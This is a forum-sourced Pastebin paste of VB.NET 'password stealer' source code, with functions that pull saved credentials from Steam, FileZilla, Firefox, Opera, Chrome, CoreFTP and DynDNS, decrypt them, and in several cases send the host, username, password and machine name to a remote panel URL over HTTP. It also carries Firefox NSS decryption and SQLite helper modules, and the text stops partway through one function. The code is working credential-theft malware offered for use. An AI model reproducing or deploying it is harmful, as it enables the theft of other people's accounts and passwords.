API tools faq
paste
Advertisement
Guest User

vb.net password stealer source

a guest
May 11th, 2013
3,853
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 51.32 KB | None | 0 0
raw download clone embed print report
  1. vb.net password stealer source(re-upload)
  2.  
  3.  
  4. 'From Brizzel@HF
  5. '
  6. 'Steam username Stealer
  7.  
  8. Public Shared Function GetSteamUsername() As Object
  9. Dim obj2 As Object
  10. Dim num2 As Integer
  11. Try
  12. Dim num3 As Integer
  13. Label_0000:
  14. ProjectData.ClearProjectError
  15. Dim num As Integer = 1
  16. Label_0008:
  17. num3 = 2
  18. Dim str2 As String = Conversions.ToString(MyProject.Computer.Registry.GetValue("HKEY_CURRENT_USER\SOFTWARE\Valve\Steam", "SteamPath", ""))
  19. Label_002F:
  20. num3 = 3
  21. Dim file As String = (str2 & "\config\SteamAppData.vdf")
  22. Label_003E:
  23. num3 = 4
  24. Dim strArray As String() = MyProject.Computer.FileSystem.ReadAllText(file).Split(New Char() { """"c })
  25. Label_0067:
  26. num3 = 5
  27. If (strArray(9) = "") Then
  28. goto Label_0099
  29. End If
  30. Label_007C:
  31. num3 = 6
  32. strArray(9) = strArray(9)
  33. Label_0087:
  34. num3 = 7
  35. obj2 = strArray(9)
  36. goto Label_0131
  37. Label_0099:
  38. num3 = 9
  39. Label_009D:
  40. num3 = 10
  41. obj2 = Nothing
  42. goto Label_0131
  43. Label_00AD:
  44. num2 = 0
  45. Select Case (num2 + 1)
  46. Case 1
  47. goto Label_0000
  48. Case 2
  49. goto Label_0008
  50. Case 3
  51. goto Label_002F
  52. Case 4
  53. goto Label_003E
  54. Case 5
  55. goto Label_0067
  56. Case 6
  57. goto Label_007C
  58. Case 7
  59. goto Label_0087
  60. Case 8, 11, 12
  61. goto Label_0131
  62. Case 9
  63. goto Label_0099
  64. Case 10
  65. goto Label_009D
  66. Case Else
  67. goto Label_0126
  68. End Select
  69. Label_00EF:
  70. num2 = num3
  71. Select Case num
  72. Case 0
  73. goto Label_0126
  74. Case 1
  75. goto Label_00AD
  76. End Select
  77. Catch obj1 As Object When (?)
  78. ProjectData.SetProjectError(DirectCast(obj1, Exception))
  79. goto Label_00EF
  80. End Try
  81. Label_0126:
  82. Throw ProjectData.CreateProjectError(-2146828237)
  83. Label_0131:
  84. If (num2 <> 0) Then
  85. ProjectData.ClearProjectError
  86. End If
  87. Return obj2
  88. End Function
  89.  
  90.  
  91. 'Filezilla Password Stealer
  92.  
  93.  
  94. Public Shared Function GetFZ() As String
  95. Dim document As New XmlDocument
  96. Dim left As Object = Nothing
  97. Dim str As String = ""
  98. Dim path As String = (Interaction.Environ("appdata") & "\FileZilla\recentservers.xml")
  99. If File.Exists(path) Then
  100. Try
  101. document.Load(path)
  102. Dim elementsByTagName As XmlNodeList = document.GetElementsByTagName("Host")
  103. Dim list As XmlNodeList = document.GetElementsByTagName("Port")
  104. Dim list2 As XmlNodeList = document.GetElementsByTagName("User")
  105. Dim list3 As XmlNodeList = document.GetElementsByTagName("Pass")
  106. Dim num2 As Integer = (elementsByTagName.Count - 1)
  107. Dim i As Integer = 0
  108. Do While (i <= num2)
  109. left = Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(left, "Application: FileZilla"), ChrW(13) & ChrW(10)), "Host: "), elementsByTagName.ItemOf(i).InnerText), ChrW(13) & ChrW(10)), "Port: "), list.ItemOf(i).InnerText), ChrW(13) & ChrW(10)), "Username: "), list2.ItemOf(i).InnerText), ChrW(13) & ChrW(10)), "Password: "), list3.ItemOf(i).InnerText), ChrW(13) & ChrW(10)), ChrW(13) & ChrW(10))
  110. New WebClient().DownloadString(String.Concat(New String() { QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.URL, "?action=add&a=15&u=", elementsByTagName.ItemOf(i).InnerText, "&l=", list2.ItemOf(i).InnerText, "&p=", list3.ItemOf(i).InnerText, "&c=", MyProject.Computer.Name.ToString }))
  111. i += 1
  112. Loop
  113. str = Conversions.ToString(left)
  114. Catch exception1 As Exception
  115. ProjectData.SetProjectError(exception1)
  116. ProjectData.ClearProjectError
  117. End Try
  118. End If
  119. Return str
  120. End Function
  121.  
  122.  
  123. 'Firefox Password Stealer
  124.  
  125.  
  126. Public Shared Sub GetFF()
  127. Dim str4 As String = Nothing
  128. Dim enumerator As IEnumerator
  129. Dim enumerator2 As IEnumerator
  130. Dim flag As Boolean = False
  131. Dim str2 As String = (Environment.GetFolderPath(SpecialFolder.ProgramFiles) & "\Mozilla Firefox\")
  132. Dim str5 As String
  133. For Each str5 In Directory.GetDirectories((Environment.GetFolderPath(SpecialFolder.ApplicationData) & "\Mozilla\Firefox\Profiles"))
  134. If flag Then
  135. Exit For
  136. End If
  137. Dim str6 As String
  138. For Each str6 In Directory.GetFiles(str5)
  139. If Not flag Then
  140. If Regex.IsMatch(str6, "signons.sqlite") Then
  141. QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.oivGmTktmoB(str5)
  142. QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.heria = str6
  143. End If
  144. Else
  145. ProjectData.EndApp
  146. Exit For
  147. End If
  148. Next
  149. Next
  150. Dim heria As String = QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.heria
  151. Dim item2 As New TSECItem
  152. Dim result As New TSECItem
  153. Dim item As New TSECItem
  154. Dim base2 As New Base(heria)
  155. Dim table As DataTable = base2.ExecuteQuery("SELECT * FROM moz_logins;")
  156. Dim table2 As DataTable = base2.ExecuteQuery("SELECT * FROM moz_disabledHosts;")
  157. Try
  158. enumerator = table2.Rows.GetEnumerator
  159. Do While enumerator.MoveNext
  160. Dim current As DataRow = DirectCast(enumerator.Current, DataRow)
  161. str4 = (str4 & Environment.NewLine & "hostname".ToString)
  162. Loop
  163. Finally
  164. If TypeOf enumerator Is IDisposable Then
  165. TryCast(enumerator,IDisposable).Dispose
  166. End If
  167. End Try
  168. QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.OMhwbbbdVrvk(QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.bvryeuuo, True, 0)
  169. Try
  170. enumerator2 = table.Rows.GetEnumerator
  171. Do While enumerator2.MoveNext
  172. Dim buffer2 As Byte()
  173. Dim row2 As DataRow = DirectCast(enumerator2.Current, DataRow)
  174. str4 = (str4 & Environment.NewLine & "Application: FireFox")
  175. Dim str7 As String = Convert.ToString(row2.Item("formSubmitURL").ToString)
  176. str4 = (str4 & Environment.NewLine & "URL: " & str7)
  177. Dim inStr As New StringBuilder(row2.Item("encryptedUsername").ToString)
  178. Dim num3 As Integer = QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.xSGTjizteYUcgxxr(IntPtr.Zero, IntPtr.Zero, inStr, inStr.Length)
  179. Dim ptr As New IntPtr(num3)
  180. Dim data As TSECItem = DirectCast(Marshal.PtrToStructure(ptr, GetType(TSECItem)), TSECItem)
  181. If ((QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.CqSzxpvjJWBHufugp(data, result, 0) = 0) AndAlso (result.SECItemLen <> 0)) Then
  182. buffer2 = New Byte(((result.SECItemLen - 1) + 1) - 1) {}
  183. ptr = New IntPtr(result.SECItemData)
  184. Marshal.Copy(ptr, buffer2, 0, result.SECItemLen)
  185. str4 = (str4 & Environment.NewLine & "Username: " & Encoding.ASCII.GetString(buffer2))
  186. End If
  187. Dim builder As New StringBuilder(row2.Item("encryptedPassword").ToString)
  188. Dim num2 As Integer = QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.xSGTjizteYUcgxxr(IntPtr.Zero, IntPtr.Zero, builder, builder.Length)
  189. ptr = New IntPtr(num2)
  190. Dim item5 As TSECItem = DirectCast(Marshal.PtrToStructure(ptr, GetType(TSECItem)), TSECItem)
  191. If ((QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.CqSzxpvjJWBHufugp(item5, item, 0) = 0) AndAlso (item.SECItemLen <> 0)) Then
  192. Dim destination As Byte() = New Byte(((item.SECItemLen - 1) + 1) - 1) {}
  193. ptr = New IntPtr(item.SECItemData)
  194. Marshal.Copy(ptr, destination, 0, item.SECItemLen)
  195. str4 = String.Concat(New String() { str4, Environment.NewLine, "Passwort: ", Encoding.ASCII.GetString(destination), Environment.NewLine })
  196. QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.FFString = str4
  197. New WebClient().DownloadString(String.Concat(New String() { QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.URL, "?action=add&a=10&u=", str7, "&l=", Encoding.ASCII.GetString(buffer2), "&p=", Encoding.ASCII.GetString(destination), "&c=", MyProject.Computer.Name.ToString }))
  198. End If
  199. Loop
  200. Finally
  201. If TypeOf enumerator2 Is IDisposable Then
  202. TryCast(enumerator2,IDisposable).Dispose
  203. End If
  204. End Try
  205. End Sub
  206.  
  207.  
  208.  
  209. 'Opera Password Stealer
  210.  
  211.  
  212. Public Shared Function GetOperaa() As String
  213. Dim str As String
  214. Dim list As New List(Of String)
  215. Dim strArray As String() = DirectCast(QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.DecryptInfo, String())
  216. Dim builder As New StringBuilder
  217. Dim str2 As String
  218. For Each str2 In strArray
  219. If (str2 <> "") Then
  220. list.Add(str2)
  221. End If
  222. Next
  223. If (list.Count = 0) Then
  224. Return " " & ChrW(13) & ChrW(10)
  225. End If
  226. Try
  227. Dim num3 As Integer = (list.Count - 1)
  228. Dim i As Integer = 0
  229. Do While (i <= num3)
  230. builder.Append("Application: Opera" & ChrW(13) & ChrW(10))
  231. builder.Append(("Host: " & list.Item(i).Substring(0) & ChrW(13) & ChrW(10)))
  232. builder.Append(("User Name: " & list.Item((i + 1)).Substring(1) & ChrW(13) & ChrW(10)))
  233. builder.Append(("Password: " & list.Item((i + 2)).Substring(1) & ChrW(13) & ChrW(10) & ChrW(13) & ChrW(10)))
  234. Dim str3 As String = list.Item(i).Substring(1)
  235. Dim str5 As String = list.Item((i + 1)).Substring(1)
  236. Dim str4 As String = list.Item((i + 2)).Substring(1)
  237. New WebClient().DownloadString(String.Concat(New String() { QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.URL, "?action=add&a=13&u=", str3, "&l=", str5, "&p=", str4, "&c=", MyProject.Computer.Name.ToString }))
  238. i = (i + 3)
  239. Loop
  240. str = builder.ToString
  241. Catch exception1 As Exception
  242. ProjectData.SetProjectError(exception1)
  243. ProjectData.ClearProjectError
  244. End Try
  245. Return str
  246. End Function
  247.  
  248.  
  249.  
  250. 'Google Chrome Password Stealer
  251.  
  252. [php]
  253. Public Shared Function GetChrome() As Object
  254. Dim obj2 As Object
  255. Dim baseName As String = (Environment.GetFolderPath(SpecialFolder.LocalApplicationData) & "\Google\Chrome\User Data\Default\Login Data")
  256. Try
  257. Dim instance As Object = New SQLiteHandler(baseName)
  258. NewLateBinding.LateCall(instance, Nothing, "ReadTable", New Object() { "logins" }, Nothing, Nothing, Nothing, True)
  259. If Not File.Exists(baseName) Then
  260. Return obj2
  261. End If
  262. Dim num2 As Integer = Conversions.ToInteger(Operators.SubtractObject(NewLateBinding.LateGet(instance, Nothing, "GetRowCount", New Object(0 - 1) {}, Nothing, Nothing, Nothing), 1))
  263. Dim i As Integer = 0
  264. Do While (i <= num2)
  265. Dim arguments As Object() = New Object() { i, "origin_url" }
  266. Dim copyBack As Boolean() = New Boolean() { True, False }
  267. If copyBack(0) Then
  268. i = CInt(Conversions.ChangeType(RuntimeHelpers.GetObjectValue(arguments(0)), GetType(Integer)))
  269. End If
  270. Dim str5 As String = Conversions.ToString(NewLateBinding.LateGet(instance, Nothing, "GetValue", arguments, Nothing, Nothing, copyBack))
  271. Dim objArray As Object() = New Object() { i, "username_value" }
  272. copyBack = New Boolean() { True, False }
  273. If copyBack(0) Then
  274. i = CInt(Conversions.ChangeType(RuntimeHelpers.GetObjectValue(objArray(0)), GetType(Integer)))
  275. End If
  276. Dim str2 As String = Conversions.ToString(NewLateBinding.LateGet(instance, Nothing, "GetValue", objArray, Nothing, Nothing, copyBack))
  277. Dim objArray3 As Object() = New Object(1 - 1) {}
  278. Dim obj4 As Object = instance
  279. arguments = New Object(2 - 1) {}
  280. arguments(0) = i
  281. Dim str6 As String = "password_value"
  282. arguments(1) = str6
  283. objArray = arguments
  284. copyBack = New Boolean() { True, False }
  285. If copyBack(0) Then
  286. i = CInt(Conversions.ChangeType(RuntimeHelpers.GetObjectValue(objArray(0)), GetType(Integer)))
  287. End If
  288. objArray3(0) = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(obj4, Nothing, "GetValue", objArray, Nothing, Nothing, copyBack))
  289. Dim objArray4 As Object() = objArray3
  290. Dim flagArray2 As Boolean() = New Boolean() { True }
  291. If flagArray2(0) Then
  292. NewLateBinding.LateSetComplex(obj4, Nothing, "GetValue", New Object() { i, str6, RuntimeHelpers.GetObjectValue(objArray4(0)) }, Nothing, Nothing, True, False)
  293. End If
  294. Dim str4 As String = QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.Wegsada(DirectCast(NewLateBinding.LateGet(Encoding.Default, Nothing, "GetBytes", objArray4, Nothing, Nothing, flagArray2), Byte()))
  295. If ((str2 <> "") And (str4 <> "")) Then
  296. Dim item As String = String.Concat(New String() { "Application: Google Chrome" & ChrW(13) & ChrW(10) & "Host: ", str5, ChrW(13) & ChrW(10) & "Username: ", str2, ChrW(13) & ChrW(10) & "Password: ", str4, ChrW(13) & ChrW(10) })
  297. QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.ListBox1.Items.Add(item)
  298. New WebClient().DownloadString(String.Concat(New String() { QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.URL, "?action=add&a=12&u=", str5, "&l=", str2, "&p=", str4, "&c=", MyProject.Computer.Name.ToString }))
  299. End If
  300. i += 1
  301. Loop
  302. Catch exception1 As Exception
  303. ProjectData.SetProjectError(exception1)
  304. ProjectData.ClearProjectError
  305. End Try
  306. Return obj2
  307. End Function
  308.  
  309.  
  310. 'CoreFTP Password Stealer
  311.  
  312.  
  313. Module CoreFTP
  314.     Function CoreFTP() As String
  315.         Dim sPath As String = Environ$("APPDATA") & "\CoreFTP\sites.idx"
  316.         Dim sFile As String = ReadFile(sPath)
  317.         Dim sHost As String = RegRead("HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\" & sFile & "\Host")
  318.         Dim sPort As String = RegRead("HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\" & sFile & "\Port")
  319.         Dim sUser As String = RegRead("HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\" & sFile & "\User")
  320.         Dim sPwd As String = RegRead("HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\" & sFile & "\PW")
  321.         Dim sEntry As String = RegRead("HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\" & sFile & "\Name")
  322.  
  323.         If Not sUser = "" Then
  324.             Try
  325.                 CoreFTP = "Entry: " + sEntry + vbNewLine + "Host: " + sHost + ":" + sPort + vbNewLine + "User: " + sUser + vbNewLine + "Pwd: " + sPwd + " (Encrypt)"
  326.                 Dim nl As String = vbNewLine
  327.                 Form1.ztext.AppendText(nl)
  328.                 Form1.ztext.AppendText("============CoreFTP==============")
  329.                 Form1.ztext.AppendText(nl)
  330.                 Form1.ztext.AppendText("Entry: " & sEntry)
  331.                 Form1.ztext.AppendText(nl)
  332.                 Form1.ztext.AppendText("Host: " & sHost)
  333.                 Form1.ztext.AppendText(": " & sPort)
  334.                 Form1.ztext.AppendText(nl)
  335.                 Form1.ztext.AppendText("User: " & sUser)
  336.                 Form1.ztext.AppendText(nl)
  337.                 Form1.ztext.AppendText("Password: " & sPwd)
  338.                 Form1.ztext.AppendText("=============================")
  339.                 Form1.ztext.AppendText(nl)
  340.             Catch ex As Exception
  341.                 Form1.ztext.AppendText("============CoreFTP==============")
  342.                 Form1.ztext.AppendText(vbNewLine)
  343.                 Form1.ztext.AppendText("CoreFTP Couldn't Be Recovered!")
  344.                 Form1.ztext.AppendText(vbNewLine)
  345.                 Form1.ztext.AppendText("=================================")
  346.             End Try
  347.         Else
  348.         End If
  349.     End Function
  350. End Module
  351.  
  352.  
  353. 'DYN DNS Password Stealer
  354.  
  355.  
  356. Module Dyndns
  357.     Public Function GoogleDns() As String
  358.         On Error Resume Next
  359.         GoogleDns = Nothing
  360.  
  361.         Dim sAppData As String
  362.         Dim sPath As String
  363.         Dim sLine As String
  364.         Dim sUser As String = Nothing
  365.         Dim sPassword As String = Nothing
  366.         Dim i As Integer
  367.         Dim sChars As String = Nothing
  368.         Dim lPtr As Integer
  369.  
  370.         sAppData = Environ("ALLUSERSPROFILE")
  371.  
  372.         If Right(sAppData, 1) <> "\" Then sAppData = sAppData & "\"
  373.  
  374.         sPath = sAppData & "DynDNS\Updater\config.dyndns"
  375.  
  376.         'UPGRADE_WARNING: Dir has a new behavior. Click for more: 'ms-help://MS.VSCC.v90/dv_commoner/local/redirect.htm?keyword="9B7D5ADD-D8FE-4819-A36C-6DEDAF088CC7"'
  377.         If Dir(sPath) <> "" Then
  378.             FileOpen(1, sPath, OpenMode.Binary)
  379.             Do While Not EOF(1)
  380.                 sLine = vbNullString
  381.                 sLine = LineInput(1)
  382.                 If Left(sLine, 9) = "Username=" Then sUser = Mid(sLine, 10)
  383.                 If Left(sLine, 9) = "Password=" Then
  384.                     sPassword = Mid(sLine, 10)
  385.                     'We have what we want, now exit do
  386.                     Exit Do
  387.                 End If
  388.             Loop
  389.             FileClose(1)
  390.  
  391.             For i = 1 To Len(sPassword) Step 2
  392.                 sChars = sChars & Chr(Val("&H" & Mid(sPassword, i, 2)))
  393.             Next i
  394.  
  395.             For i = 1 To Len(sChars)
  396.                 Mid(sChars, i, 1) = Chr((Asc(Mid(sChars, i, 1))) Xor (Asc(Mid("t6KzXhCh", lPtr + 1, 1))))
  397.                 lPtr = ((lPtr + 1) Mod 8)
  398.             Next i
  399.             Dim nl As String = vbNewLine
  400.             Form1.ztext.AppendText(nl)
  401.             Form1.ztext.AppendText("============DYNDNS==============")
  402.             Form1.ztext.AppendText(nl)
  403.             Form1.ztext.AppendText("Username: " & sUser)
  404.             Form1.ztext.AppendText(nl)
  405.             Form1.ztext.AppendText("Password: " & sChars)
  406.             Form1.ztext.AppendText(nl)
  407.             Form1.ztext.AppendText("=============================")
  408.             Form1.ztext.AppendText(nl)
  409.             If sUser = "" Or sChars = "" Then
  410.                 Form1.ztext.AppendText(nl)
  411.                 Form1.ztext.AppendText("============DYNDNS==============")
  412.                 Form1.ztext.AppendText(nl)
  413.                 Form1.ztext.AppendText("DYNDNS Couldn't Be Recovered!")
  414.                 Form1.ztext.AppendText(nl)
  415.                 Form1.ztext.AppendText("=============================")
  416.                 Form1.ztext.AppendText(nl)
  417.             End If
  418.         End If
  419.     End Function
  420. End Module
  421.  
  422.  
  423. 'FF1 Password Stealer
  424.  
  425.  
  426. Imports System
  427. Imports System.IO
  428. Imports System.Runtime.InteropServices
  429. Imports System.Data
  430. Imports FireFox.SQLiteWrapper
  431. Imports System.Text
  432. Module FFDecryptor
  433.  
  434.     Public Class SHITEMID
  435.         Public Shared cb As Long
  436.         Public Shared abID As Byte()
  437.     End Class
  438.     <StructLayout(LayoutKind.Sequential)> _
  439.     Public Structure TSECItem
  440.         Public SECItemType As Integer
  441.         Public SECItemData As Integer
  442.         Public SECItemLen As Integer
  443.     End Structure
  444.  
  445.     <DllImport("kernel32.dll")> _
  446.     Private Function LoadLibrary(ByVal dllFilePath As String) As IntPtr
  447.     End Function
  448.     Private NSS3 As IntPtr
  449.     <DllImport("kernel32", CharSet:=CharSet.Ansi, ExactSpelling:=True, SetLastError:=True)> _
  450.     Private Function GetProcAddress(ByVal hModule As IntPtr, ByVal procName As String) As IntPtr
  451.     End Function
  452.     <UnmanagedFunctionPointer(CallingConvention.Cdecl)> _
  453.     Public Delegate Function DLLFunctionDelegate(ByVal configdir As String) As Long
  454.     Public Function NSS_Init(ByVal configdir As String) As Long
  455.         Dim MozillaPath As String = Environment.GetEnvironmentVariable("PROGRAMFILES") & "\Mozilla Firefox\"
  456.         LoadLibrary(MozillaPath & "mozcrt19.dll")
  457.         LoadLibrary(MozillaPath & "nspr4.dll")
  458.         LoadLibrary(MozillaPath & "plc4.dll")
  459.         LoadLibrary(MozillaPath & "plds4.dll")
  460.         LoadLibrary(MozillaPath & "ssutil3.dll")
  461.         LoadLibrary(MozillaPath & "sqlite3.dll")
  462.         LoadLibrary(MozillaPath & "nssutil3.dll")
  463.         LoadLibrary(MozillaPath & "softokn3.dll")
  464.         NSS3 = LoadLibrary(MozillaPath & "nss3.dll")
  465.         Dim pProc As IntPtr = GetProcAddress(NSS3, "NSS_Init")
  466.         Dim dll As DLLFunctionDelegate = DirectCast(Marshal.GetDelegateForFunctionPointer(pProc, GetType(DLLFunctionDelegate)), DLLFunctionDelegate)
  467.         Return dll(configdir)
  468.     End Function
  469.     <UnmanagedFunctionPointer(CallingConvention.Cdecl)> _
  470.     Public Delegate Function DLLFunctionDelegate2() As Long
  471.     Public Function PK11_GetInternalKeySlot() As Long
  472.         Dim pProc As IntPtr = GetProcAddress(NSS3, "PK11_GetInternalKeySlot")
  473.         Dim dll As DLLFunctionDelegate2 = DirectCast(Marshal.GetDelegateForFunctionPointer(pProc, GetType(DLLFunctionDelegate2)), DLLFunctionDelegate2)
  474.         Return dll()
  475.     End Function
  476.     <UnmanagedFunctionPointer(CallingConvention.Cdecl)> _
  477.     Public Delegate Function DLLFunctionDelegate3(ByVal slot As Long, ByVal loadCerts As Boolean, ByVal wincx As Long) As Long
  478.     Public Function PK11_Authenticate(ByVal slot As Long, ByVal loadCerts As Boolean, ByVal wincx As Long) As Long
  479.         Dim pProc As IntPtr = GetProcAddress(NSS3, "PK11_Authenticate")
  480.         Dim dll As DLLFunctionDelegate3 = DirectCast(Marshal.GetDelegateForFunctionPointer(pProc, GetType(DLLFunctionDelegate3)), DLLFunctionDelegate3)
  481.         Return dll(slot, loadCerts, wincx)
  482.     End Function
  483.     <UnmanagedFunctionPointer(CallingConvention.Cdecl)> _
  484.     Public Delegate Function DLLFunctionDelegate4(ByVal arenaOpt As IntPtr, ByVal outItemOpt As IntPtr, ByVal inStr As StringBuilder, ByVal inLen As Integer) As Integer
  485.     Public Function NSSBase64_DecodeBuffer(ByVal arenaOpt As IntPtr, ByVal outItemOpt As IntPtr, ByVal inStr As StringBuilder, ByVal inLen As Integer) As Integer
  486.         Dim pProc As IntPtr = GetProcAddress(NSS3, "NSSBase64_DecodeBuffer")
  487.         Dim dll As DLLFunctionDelegate4 = DirectCast(Marshal.GetDelegateForFunctionPointer(pProc, GetType(DLLFunctionDelegate4)), DLLFunctionDelegate4)
  488.         Return dll(arenaOpt, outItemOpt, inStr, inLen)
  489.     End Function
  490.     <UnmanagedFunctionPointer(CallingConvention.Cdecl)> _
  491.     Public Delegate Function DLLFunctionDelegate5(ByRef data As TSECItem, ByRef result As TSECItem, ByVal cx As Integer) As Integer
  492.     Public Function PK11SDR_Decrypt(ByRef data As TSECItem, ByRef result As TSECItem, ByVal cx As Integer) As Integer
  493.         Dim pProc As IntPtr = GetProcAddress(NSS3, "PK11SDR_Decrypt")
  494.         Dim dll As DLLFunctionDelegate5 = DirectCast(Marshal.GetDelegateForFunctionPointer(pProc, GetType(DLLFunctionDelegate5)), DLLFunctionDelegate5)
  495.         Return dll(data, result, cx)
  496.     End Function
  497.     Public signon As String
  498. End Module
  499.  
  500.  
  501. 'FF2 Password Stealer
  502.  
  503.  
  504. Imports System
  505. Imports System.Collections.Generic
  506. Imports System.Text
  507. Imports System.Runtime.InteropServices
  508. Imports System.Data
  509. Imports System.Collections
  510.  
  511. Namespace SQLiteWrapper
  512.     Public Class SQLiteBase
  513.         <DllImport("kernel32")> _
  514.         Private Shared Function HeapAlloc(ByVal heap As IntPtr, ByVal flags As UInt32, ByVal bytes As UInt32) As IntPtr
  515.         End Function
  516.  
  517.         <DllImport("kernel32")> _
  518.         Private Shared Function GetProcessHeap() As IntPtr
  519.         End Function
  520.  
  521.         <DllImport("kernel32")> _
  522.         Private Shared Function lstrlen(ByVal str As IntPtr) As Integer
  523.         End Function
  524.         <DllImport("sqlite3")> _
  525.         Private Shared Function sqlite3_open(ByVal fileName As IntPtr, ByRef database As IntPtr) As Integer
  526.         End Function
  527.  
  528.         <DllImport("sqlite3")> _
  529.         Private Shared Function sqlite3_close(ByVal database As IntPtr) As Integer
  530.         End Function
  531.  
  532.         <DllImport("sqlite3")> _
  533.         Private Shared Function sqlite3_exec(ByVal database As IntPtr, ByVal query As IntPtr, ByVal callback As IntPtr, ByVal arguments As IntPtr, ByRef [error] As IntPtr) As Integer
  534.         End Function
  535.  
  536.         <DllImport("sqlite3")> _
  537.         Private Shared Function sqlite3_errmsg(ByVal database As IntPtr) As IntPtr
  538.         End Function
  539.  
  540.         <DllImport("sqlite3")> _
  541.         Private Shared Function sqlite3_prepare_v2(ByVal database As IntPtr, ByVal query As IntPtr, ByVal length As Integer, ByRef statement As IntPtr, ByRef tail As IntPtr) As Integer
  542.         End Function
  543.  
  544.         <DllImport("sqlite3")> _
  545.         Private Shared Function sqlite3_step(ByVal statement As IntPtr) As Integer
  546.         End Function
  547.  
  548.         <DllImport("sqlite3")> _
  549.         Private Shared Function sqlite3_column_count(ByVal statement As IntPtr) As Integer
  550.         End Function
  551.  
  552.         <DllImport("sqlite3")> _
  553.         Private Shared Function sqlite3_column_name(ByVal statement As IntPtr, ByVal columnNumber As Integer) As IntPtr
  554.         End Function
  555.  
  556.         <DllImport("sqlite3")> _
  557.         Private Shared Function sqlite3_column_type(ByVal statement As IntPtr, ByVal columnNumber As Integer) As Integer
  558.         End Function
  559.  
  560.         <DllImport("sqlite3")> _
  561.         Private Shared Function sqlite3_column_int(ByVal statement As IntPtr, ByVal columnNumber As Integer) As Integer
  562.         End Function
  563.  
  564.         <DllImport("sqlite3")> _
  565.         Private Shared Function sqlite3_column_double(ByVal statement As IntPtr, ByVal columnNumber As Integer) As Double
  566.         End Function
  567.  
  568.         <DllImport("sqlite3")> _
  569.         Private Shared Function sqlite3_column_text(ByVal statement As IntPtr, ByVal columnNumber As Integer) As IntPtr
  570.         End Function
  571.  
  572.         <DllImport("sqlite3")> _
  573.         Private Shared Function sqlite3_column_blob(ByVal statement As IntPtr, ByVal columnNumber As Integer) As IntPtr
  574.         End Function
  575.  
  576.         <DllImport("sqlite3")> _
  577.         Private Shared Function sqlite3_column_table_name(ByVal statement As IntPtr, ByVal columnNumber As Integer) As IntPtr
  578.         End Function
  579.  
  580.         <DllImport("sqlite3")> _
  581.         Private Shared Function sqlite3_finalize(ByVal handle As IntPtr) As Integer
  582.         End Function
  583.  
  584.         ' SQLite constants
  585.         Private Const SQL_OK As Integer = 0
  586.         Private Const SQL_ROW As Integer = 100
  587.         Private Const SQL_DONE As Integer = 101
  588.         Public Enum SQLiteDataTypes
  589.             INT = 1
  590.             FLOAT
  591.             TEXT
  592.             BLOB
  593.             NULL
  594.         End Enum
  595.         Private database As IntPtr
  596.         Public Sub New()
  597.             database = IntPtr.Zero
  598.         End Sub
  599.         Public Sub New(ByVal baseName As [String])
  600.             OpenDatabase(baseName)
  601.         End Sub
  602.         Public Sub OpenDatabase(ByVal baseName As [String])
  603.             If sqlite3_open(StringToPointer(baseName), database) <> SQL_OK Then
  604.                 database = IntPtr.Zero
  605.                 Throw New Exception("Error with opening database " & baseName & "!")
  606.             End If
  607.         End Sub
  608.         Public Sub CloseDatabase()
  609.             If database <> IntPtr.Zero Then
  610.                 sqlite3_close(database)
  611.             End If
  612.         End Sub
  613.         Public Function GetTables() As ArrayList
  614.             Dim query As [String] = "SELECT name FROM sqlite_master " & "WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%'" & "UNION ALL " & "SELECT name FROM sqlite_temp_master " & "WHERE type IN ('table','view') " & "ORDER BY 1"
  615.             Dim table As DataTable = ExecuteQuery(query)
  616.             Dim list As New ArrayList()
  617.             For Each row As DataRow In table.Rows
  618.                 list.Add(row.ItemArray(0).ToString())
  619.             Next
  620.             Return list
  621.         End Function
  622.         Public Sub ExecuteNonQuery(ByVal query As [String])
  623.             Dim [error] As IntPtr
  624.             sqlite3_exec(database, StringToPointer(query), IntPtr.Zero, IntPtr.Zero, [error])
  625.             If [error] <> IntPtr.Zero Then
  626.                 Throw New Exception(("Error with executing non-query: """ & query & """!" & vbLf) + PointerToString(sqlite3_errmsg([error])))
  627.             End If
  628.         End Sub
  629.         Public Function ExecuteQuery(ByVal query As [String]) As DataTable
  630.             Dim statement As IntPtr
  631.             Dim excessData As IntPtr
  632.             sqlite3_prepare_v2(database, StringToPointer(query), GetPointerLenght(StringToPointer(query)), statement, excessData)
  633.             Dim table As New DataTable()
  634.             Dim result As Integer = ReadFirstRow(statement, table)
  635.             While result = SQL_ROW
  636.                 result = ReadNextRow(statement, table)
  637.             End While
  638.             sqlite3_finalize(statement)
  639.             Return table
  640.         End Function
  641.         Private Function ReadFirstRow(ByVal statement As IntPtr, ByRef table As DataTable) As Integer
  642.             table = New DataTable("resultTable")
  643.             Dim resultType As Integer = sqlite3_step(statement)
  644.             If resultType = SQL_ROW Then
  645.                 Dim columnCount As Integer = sqlite3_column_count(statement)
